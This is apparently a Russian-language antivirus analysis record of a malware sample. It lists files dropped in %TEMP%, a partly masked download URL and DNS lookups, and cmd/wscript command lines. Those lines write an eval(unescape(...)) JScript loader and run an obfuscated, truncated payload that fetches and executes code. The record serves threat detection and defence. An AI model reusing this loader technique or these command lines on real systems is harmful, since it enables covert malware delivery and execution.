Техническая информация
- '%TEMP%\tmp683982.784'
- tmp683982.784
- %TEMP%\76782785.txt
- %TEMP%\tmp683982.784
- %TEMP%\silvan.cab
- %TEMP%\fluttering.dll
- %TEMP%\nsw9fa9.tmp\system.dll
- http://www.ne####enadhanou.cz/nvdtime.prs
- DNS ASK ho##or.com
- DNS ASK ne####enadhanou.cz
- ClassName: '' WindowName: ''
- '<SYSTEM32>\wscript.exe' /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbnFOhL%3D%20%2878717%2C%22Wr%22+%22ite%22%29%3BtfPmgkg%3D%20%2873498%2C%22GE%22+%22T%22%29%3BITPF%3D%20%2869054%2C%22Ex%22+%22ec%22%29%3Bf...
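- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbnFOhL%3D%20%2878717%2C%22Wr%22+%22ite%22%29%3B...' (со скрытым окном; команда записывает в %TEMP%\76782785.TXT однострочный JScript eval(unescape(WScript.Arguments(0))), ждёт 3 секунды и запускает его через wscript, передавая основной сценарий в percent-кодированном виде как аргумент командной строки; строка в отчёте обрезана)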
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbnFOhL%3D%20%2878717%2C%22Wr%22+%22ite%22%29%3B...
- '<SYSTEM32>\timeout.exe' 3